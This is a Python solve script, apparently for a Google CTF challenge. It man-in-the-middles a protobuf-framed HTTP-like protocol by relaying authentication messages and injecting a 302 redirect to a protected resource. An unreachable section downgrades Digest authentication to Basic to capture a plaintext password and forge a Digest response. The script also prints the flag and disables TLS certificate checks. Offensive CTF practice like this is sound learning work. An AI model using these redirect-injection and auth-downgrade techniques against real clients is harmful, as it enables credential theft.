#!/usr/bin/python | |
# CTF{golang_reversing_can_eat_my_balls_and_so_can_protocol_buffers} | |
try: | |
import hashlib as md5 | |
except ImportError: | |
import md5 | |
import random | |
import types | |
import dicks | |
import sys | |
import base64 | |
import opabina_pb2 | |
import struct | |
import socket | |
import ssl | |
# TEST BUILDING AUTH CHALLENGE | |
# TEST_AUTHSTRING = "Digest realm=\"testrealm@host.com\",qop=\"auth\",nonce=\"dd3b173f21ae8266\",opaque=\"dd3b173f21ae8266\"" | |
# HERPADERP | |
#partial_digest = dicks.calculate_partial_digest("google.ctf","In the realm of hackers","1932403934.1443610966.703716842") | |
#request_digest = dicks.calculate_request_digest("GET",partial_digest,uri="/protected/secret",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",nonce_count=1,client_nonce="0a4f113b") | |
#print request_digest | |
#print "6629fae49393a05397450978507c4ef1" | |
# print "DW ABOUT THE ABOVE JUST TESTING LOL" | |
# Digest material; both are filled in later from the captured exchange.
partial_digest = ""
request_digest = ""
HOST = "ssl-added-and-removed-here.ctfcompetition.com"
PORT = 13001

# Plain TCP socket, wrapped in TLS before connecting. The 10 s timeout set on
# the raw socket is inherited by the wrapped one, so it bounds connect() and
# every later recv()/send() in the script.
_raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_raw_sock.settimeout(10)
# NOTE(review): ssl.wrap_socket() defaults to cert_reqs=CERT_NONE, so the
# server certificate is never validated and no hostname check happens. That is
# tolerable for a throwaway client against a CTF endpoint; anything real should
# use ssl.create_default_context().wrap_socket(sock, server_hostname=HOST).
wrappedSocket = ssl.wrap_socket(_raw_sock)
wrappedSocket.connect((HOST, PORT))
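def _recv_exact(ws, n):
    """Read exactly *n* bytes from *ws*, looping over short reads.

    Raises EOFError if the peer closes the connection before *n* bytes have
    arrived, so a truncated frame is never handed to the protobuf parser.
    """
    buf = b""
    while len(buf) < n:
        chunk = ws.recv(n - len(buf))
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def nice_recv(ws):
    """Receive one length-prefixed Exchange message from *ws*, print it, return it.

    Frame layout is the mirror of nice_send(): a 4-byte little-endian int
    holding the payload length, followed by the serialized Exchange.

    The previous version did a single recv(1024) and ignored the length field,
    so a frame larger than 1024 bytes, or one split across TCP segments, was
    parsed truncated; reading the declared number of bytes fixes that and also
    stops swallowing bytes that belong to the next frame.

    Raises EOFError on a short read and ValueError on a negative length field.
    """
    (length,) = struct.unpack("<i", _recv_exact(ws, 4))
    if length < 0:
        raise ValueError("invalid frame length %d" % length)
    pb = opabina_pb2.Exchange()
    pb.ParseFromString(_recv_exact(ws, length))
    print(pb)
    return pb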
# d = wrappedSocket.recv(1024) | |
# print d | |
# length_marshalled = struct.unpack("<i",d[0:4]) | |
# print length_marshalled | |
# pb = opabina_pb2.Exchange() | |
# pb.ParseFromString(d[4:]) | |
# print "-- RECEIVED %d --" % len(d) | |
# rint pb | |
# The server speaks first: read (and print) its opening message. Nothing in
# it is reused, so the returned Exchange is dropped.
nice_recv(wrappedSocket)
print("-- CREATING RESPONSE --")
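def nice_send(s, data):
    """Frame *data* as <4-byte little-endian length><payload> and write it to *s*.

    *data* is any object with a SerializeToString() method (a protobuf
    message); *s* is a connected socket. Returns None.

    sendall() is used instead of send(): a bare send() may return after a
    partial write, which would leave the peer with a truncated frame whose
    length prefix no longer matches its payload.
    """
    payload = data.SerializeToString()
    header = struct.pack("<i", len(payload))
    s.sendall(header + payload)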
def _relay(label=None):
    """Read one Exchange from the socket, print *label* if given, send it back unchanged.

    Returns the relayed Exchange so the caller can keep the last message seen.
    """
    msg = nice_recv(wrappedSocket)
    if label is not None:
        print(label)
    nice_send(wrappedSocket, msg)
    return msg


# Opening request: an unauthenticated GET for the non-secret resource,
# carrying only a User-Agent header.
pb = opabina_pb2.Exchange()
pb.request.ver = 0
pb.request.uri = "/protected/not-secret"
h = pb.request.headers.add()
h.key = "User-Agent"
h.value = "opabina-regalis.go"
print("SENDING SERVER REQUEST FOR /PROTECTED/NOT-SECRET")
nice_send(wrappedSocket, pb)

print("RECEIVING....")
# Pass the authentication round trip through untouched in both directions.
pb = _relay("FORWARDING SERVER->CLIENT AUTHENTICATION REQUEST...")
pb = _relay("FORWARDING CLIENT->SERVER AUTHENTICATION REQUEST...")
pb = nice_recv(wrappedSocket)
print("THIS ISNT THE TOKEN YOURE LOOKING FOR...")

# Instead of forwarding that reply, answer with a 302 whose Location is the
# secret resource.
pb = opabina_pb2.Exchange()
pb.reply.status = 302
h = pb.reply.headers.add()
h.key = "Location"
h.value = "/protected/secret"
print("REDIRECTING USER TO /PROTECTED/SECRET, YOU SHOULD SEE A GET REQUEST...")
nice_send(wrappedSocket, pb)

# Relay the follow-up GET and its authentication exchange unchanged.
pb = _relay()
print("AUTH REQUEST NEXT?")
pb = _relay()
pb = _relay()
pb = nice_recv(wrappedSocket)
# The run ends here: everything below this sys.exit(0) (the Basic-auth
# downgrade variant of the script) is unreachable unless this line is removed.
sys.exit(0)
# Extract the server's Digest nonce from the WWW-Authenticate header of the
# last reply; the Digest response computed later has to use this exact value.
# If several such headers are present, the last one wins.
rnonce = ""
request_digest = ""
for hdr in pb.reply.headers:
    if hdr.key == "WWW-Authenticate":
        print("+++ DIGEST AUTH: %s" % hdr.value)
        import re
        nonce_match = re.search(r'nonce="(.+?)"', hdr.value)
        # A header without a nonce= parameter makes nonce_match None and the
        # next line raise AttributeError, same as before.
        print("+++ MATCH: %s" % nonce_match.group(1))
        rnonce = nonce_match.group(1)
print("-- DOWNGRADING TO FORCE BASIC HEADER")
# Reply with a 401 whose only challenge is Basic (plus the same Server and
# Location headers), in place of the server's Digest challenge. A client that
# refuses to answer a weaker scheme than the one it has already seen would not
# respond to this; accepting whatever the 401 offers is what makes it work.
pb = opabina_pb2.Exchange()
pb.reply.status = 401
for key, value in (
    ("Server", "opabina-regalis.go"),
    ("Location", "/protected/secret"),
    ("WWW-Authenticate", 'Basic realm="In the realm of hackers"'),
):
    hdr = pb.reply.headers.add()
    hdr.key = key
    hdr.value = value
nice_send(wrappedSocket, pb)
print("RECEIVING....")
# Read the client's answer with a single raw recv(): 4-byte little-endian
# length, then the serialized Exchange. The length is printed, not checked.
d = wrappedSocket.recv(1024)
length_marshalled = struct.unpack("<i", d[0:4])
print(length_marshalled)
pb = opabina_pb2.Exchange()
pb.ParseFromString(d[4:])
print(pb)

# A Basic answer carries base64("user:password") in Authorization.
for hdr in pb.request.headers:
    if hdr.key != "Authorization":
        continue
    _scheme, encoded = hdr.value.split(" ")
    user, pw = base64.b64decode(encoded).split(":")
    print("USER:%s PW:%s" % (user, pw))

# Derive the Digest response the real server expects for /protected/secret,
# using pw from the loop above and the nonce captured earlier (rnonce).
partial_digest = dicks.calculate_partial_digest("google.ctf", "In the realm of hackers", pw)
request_digest = dicks.calculate_request_digest(
    "GET",
    partial_digest,
    uri="/protected/secret",
    nonce=rnonce,
    nonce_count=1,
    client_nonce="0a4f113b",
)
print("-- REPLYING WITH AUTHENTICATION VALUE --")
# Build the GET for /protected/secret carrying a Digest Authorization header
# computed from rnonce and request_digest. Note that the opaque parameter is
# filled with request_digest rather than a value echoed from the server's
# challenge, exactly as before.
auth_value = (
    'Digest username="google.ctf",realm="In the realm of hackers",nonce="%s",'
    'uri="/protected/secret",qop=auth,nc=00000001,cnonce="0a4f113b",'
    'response="%s",opaque="%s"' % (rnonce, request_digest, request_digest)
)
pb = opabina_pb2.Exchange()
pb.request.ver = 0
pb.request.uri = "/protected/secret"
for key, value in (("User-Agent", "opabina-regalis.go"), ("Authorization", auth_value)):
    hdr = pb.request.headers.add()
    hdr.key = key
    hdr.value = value
print(pb)
nice_send(wrappedSocket, pb)

print("RECEIVING....")
# Read the final reply with a single raw recv() (length prefix printed only),
# show it, and close the TLS socket.
raw = wrappedSocket.recv(1024)
frame_len = struct.unpack("<i", raw[0:4])
print(frame_len)
pb = opabina_pb2.Exchange()
pb.ParseFromString(raw[4:])
print(pb)
wrappedSocket.close()